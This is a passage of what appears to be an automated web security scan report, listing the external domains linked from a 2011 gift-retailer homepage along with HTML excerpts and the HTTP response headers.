s/Heart-in-Sand-Framed-Print-30021311?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&viewpos=1&trackingpgroup=PHMPG05" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0084749b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174" alt="Heart in Sand Framed Print" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl0__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_7.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl0__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
ons.com/gifts/Tub-with-Stand-30021145?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&viewpos=2&trackingpgroup=PHMPG05" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_000000076432_66228_W1_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174" alt="Galvanized Beverage Tub with Stand" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl1__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_5.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl1__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
strial-Alphabet-Framed-Print-30019088?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&viewpos=3&trackingpgroup=PHMPG05" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000008G370X_85066_W7_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174" alt="Architectural Alphabet Framed Print" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl2__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_5.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl2__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
-Wedding--Anniversary-Afghan-30020974?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&viewpos=4&trackingpgroup=PHMPG05" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0026084b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174" alt="Heartwarming Wedding & Anniversary Afghan" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl3__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_7.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl3__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
ed-Photography-Framed-Prints-30019837?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&viewpos=5&trackingpgroup=PHMPG05" style="height:174px;width:174px;"><img height="174px" width="174px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D01X_103184_W1?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174" alt="Wine Inspired Photography Framed Prints" border="0" /></a>
...[SNIP]...
<div class="ReviewHolder">
           <img id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl4__ctl0__customerRating" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images//rating-4_2.gif" border="0" />
           <span id="_ctl10_rptProductGroups__ctl4_productlist__ctl0__ctl4__ctl0__numberOfCustomerReviews" class="SmallSize ReviewWrapper">
...[SNIP]...
er Your Email Here
                   " id="_ctl11__ctl0_emailInput" class="textBox" onclick="javascript:this.value='';" onkeypress="return CaptureEnterInEmailEntry(footerClientID)" />
<img onclick="SetEmailEntryUrl()" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/personalcreations/images/Go_Btn.gif" alt="Sign Up for Email Savings" border="0" />
</div>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="margin-left:5px;margin-top:-1px;vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
<li><a rel="nofollow" href="https://accounts.proflowers.com/ManageOrderHistory.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&cobrand=pcr">My Account</a>
...[SNIP]...
<li><a rel="nofollow" href="https://accounts.proflowers.com/ManageOrderHistory.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&cobrand=pcr">Order Tracking</a>
...[SNIP]...
<li><a rel="nofollow" href="https://accounts.proflowers.com/ManageReminders.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&cobrand=pcr">Reminder Service</a>
...[SNIP]...
<li><a border="0" href="http://www.providecommerce.com/Careers_Overview.aspx">Careers</a>
...[SNIP]...
<li><a border="0" href="http://www.providecommerce.com/privacy.aspx">Privacy & Security</a>
...[SNIP]...
<li><a border="0" href="http://www.providecommerce.com/terms.aspx">Terms Of Use</a>
...[SNIP]...
<li><a border="0" href="http://content.yudu.com/A1tfdc/PerCreation2011Fall2/resources/index.htm" target="_blank">View Catalog Online</a>
...[SNIP]...
<li><a href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/PersonalCreations/images/PCR_ApparelSizeCharts.pdf" target="_blank">Apparel Size Charts</a>
...[SNIP]...
<li><a href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/PersonalCreations/images/PCR_Ringsize.pdf" target="_blank">Ring Size Charts</a>
...[SNIP]...
</p>
<a title="The freshest flowers, guaranteed to last at least 7 days." border="0" rel="nofollow" href="http://www.proflowers.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:120px;"><img class="footerLogo_PFC" height=35px width=120px class="footerLogo_PFC" height="35px" width="120px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The freshest flowers, guaranteed to last at least 7 days." border="0" /></a> <a title="A wide selection of green and exotic plants, perfect for gift and home d..cor." border="0" rel="nofollow" href="http://www.proplants.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:110px;"><img class="footerLogo_PLA" height=35px width=110px class="footerLogo_PLA" height="35px" width="110px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="A wide selection of green and exotic plants, perfect for gift and home d..cor." border="0" /></a> <a title="International flower delivery" border="0" rel="nofollow" href="http://www.proflowers.com/international?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:128px;"><img class="footerLogo_PFCint" height=35px width=128px class="footerLogo_PFCint" height="35px" width="128px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="International flower delivery" border="0" /></a>
<a title="The place for unique and personalized gifts." border="0" rel="nofollow" href="http://www.redenvelope.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:151px;"><img class="footerLogo_RED" height=35px width=151px class="footerLogo_RED" height="35px" width="151px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The place for unique and personalized gifts." border="0" /></a>
<a title="Farm fresh fruit, gift baskets and delicious hand-made sweets." border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:160px;"><img class="footerLogo_CMF" height=35px width=160px class="footerLogo_CMF" height="35px" width="160px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Farm fresh fruit, gift baskets and delicious hand-made sweets." border="0" /></a>
...[SNIP]...
life...s special occasions." border="0" href="http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:177px;"><img class="footerLogo_PCR" height="35px" width="177px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Unique personalized gifts for life...s special occasions." border="0" /></a>
<a title="Gourmet hand-dipped berries, cookies and cakes." border="0" href="http://www.berries.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme" style="height:35px;width:83px;"><img class="footerLogo_SHB" height=35px width=83px class="footerLogo_SHB" height="35px" width="83px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Gourmet hand-dipped berries, cookies and cakes." border="0" /></a>
...[SNIP]...
<div class="OtherBrands XSmallSize">
           Other Liberty Media Brands and Services:
           <a id="_ctl11__ctl0_FooterLink_berries" href="http://www.berries.com/">Hand-Dipped Strawberries</a>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
<br/><a class="Underlined" onclick="" href="http://www.facebook.com/personalcreations">Personal Creations Facebook</a><br/><a class="Underlined" onclick="" href="http://twitter.com/pcgifts">Personal Creations Twitter</a><br/><a class="Underlined" onclick="" href="http://www.linkedin.com/company/personal-creations">Personal Creations Linked-In</a>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
       <img src="http://link.mercent.com/image.ashx?merchantID=ProFlowers" style="display: none;">
   </noscript>
...[SNIP]...

18.27. http://www.personalcreations.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalcreations.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.personalcreations.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&Keyword=PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp_html&Network=Casale_Media

The response contains the following links to other domains:

http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0026084b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0054242b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0057916b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0071881?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0073727b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0105447b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0105684b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0106998b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000001016X_35172_W1?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_000000076432_66228_W1_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007G437_68702_W1_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007H355_69865_W2_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008H201_82170_W2_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008H203_82172_W1_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D01X_103184_W1?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000008G370X_85066_W7_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000009A230X_85266_W1_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_000000011F48_0138343_W1_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000002352X_0049859_W1_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000011A98X_114727_W1?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000009G125X_0090481_W2_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011F111X_0138942_W1_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011G128X_0134102_W1_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011G242X_0136242_W1_SQ?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0084749b?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery.cycle.all.latest.min.js
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/json-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_default.css?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_dynamicnavbarstyles.css?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_lockdown.css?siteversionnumber=2011.08.31.1
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/PersonalCreations/images/PCR_ApparelSizeCharts.pdf
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/PersonalCreations/images/PCR_Ringsize.pdf
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/PersonalCreations/images/favicon.ico
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/berries/siteimages/SiteFeedback_sm.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PCR_H_HER_758x310_B2S11_SIT_04.jpg
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PCR_H_HER_758x310_CHR11_SIT_01.jpg
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PCR_H_HER_758x310_HAL11_SIT_04.jpg
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PCR_H_HER_758x310_WED11_SIT_03.jpg
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PCR_H_TIL_193x154_SAL11_SIT_02.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/PC_RightTopHeroPod_Birthday.jpg
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/rating-0_0.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/rating-3_7.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/rating-4_2.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/rating-4_4.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/rating-4_5.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/rating-4_6.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/rating-4_7.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/rating-4_8.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/rating-4_9.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/personalcreations/images/rating-5_0.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/CMF_dropdown.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PC_dropdown.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PF_dropdown.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PP_dropdown.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/RED_dropdown.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/SB_dropdown.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif
http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif
http://content.yudu.com/A1tfdc/PerCreation2011Fall2/resources/index.htm
http://link.mercent.com/image.ashx?merchantID=ProFlowers
http://twitter.com/pcgifts
http://www.berries.com/
http://www.berries.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme
http://www.berries.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme
http://www.cherrymoonfarms.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme
http://www.cherrymoonfarms.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme
http://www.facebook.com/personalcreations
http://www.linkedin.com/company/personal-creations
http://www.proflowers.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme
http://www.proflowers.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme
http://www.proflowers.com/international?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme
http://www.proplants.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme
http://www.proplants.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme
http://www.providecommerce.com/Careers_Overview.aspx
http://www.providecommerce.com/privacy.aspx
http://www.providecommerce.com/terms.aspx
http://www.redenvelope.com/?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme
http://www.redenvelope.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme
https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/personalcreations/images/Go_Btn.gif
https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif
https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif
https://accounts.proflowers.com/ManageOrderHistory.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&cobrand=PCR
https://accounts.proflowers.com/ManageOrderHistory.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&cobrand=pcr
https://accounts.proflowers.com/ManageReminders.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&cobrand=pcr
https://accounts.proflowers.com/default.aspx?ref=pcrprtlscasalemedia_ronCPCAnniversary_hp_720x300Anniv_HrtsndprntPwtrpltThennowfrme&cobrand=PCR
https://cdn.mercent.com/js/tracker.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=uvn4ybjeh3ciqrzoi2ilygjh; domain=personalcreations.com; path=/
Set-Cookie: ASP.NET_SessionId=uvn4ybjeh3ciqrzoi2ilygjh; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PCR=TestAssignmentValues=nta-2,trm-1,xtc-1,ttb-4,nte-3,ntc-2,ntb-1,xta-1,trf-2,tpp-3,tbc-1,ntd-1,tvc-2,tmm-1,xtb-1,tnp-1,tpf-2; domain=.personalcreations.com; expires=Thu, 04-Oct-2012 00:48:11 GMT; path=/
Set-Cookie: ENDOFDAY_PCR=TestAssignmentValues=,txc-1,tkt-2,thp-1,txb-1,tks-2,tms-1,mpsmediapersonalitysplit-1; domain=.personalcreations.com; expires=Sun, 04-Sep-2011 06:59:59 GMT; path=/
Set-Cookie: CURRENTSESSION_PCR=TestConfigDateTimeUpdated=9/3/2011 5:48:11 PM; domain=.personalcreations.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=42; domain=.personalcreations.com; expires=Wed, 07-Sep-2011 00:48:11 GMT; path=/
Set-Cookie: PCR_BrowserId=d9954876-3a8e-4f70-8099-40c2ea2161b9; domain=.personalcreations.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PCR_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.personalcreations.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:48:14 GMT
Content-Length: 166986

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html xmlns="http://www.w3.org/1999/xhtml">
   <head><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_default.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_dynamicnavbarstyles.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_lockdown.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><title>
...[SNIP]...
<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.08.31.1"></script>
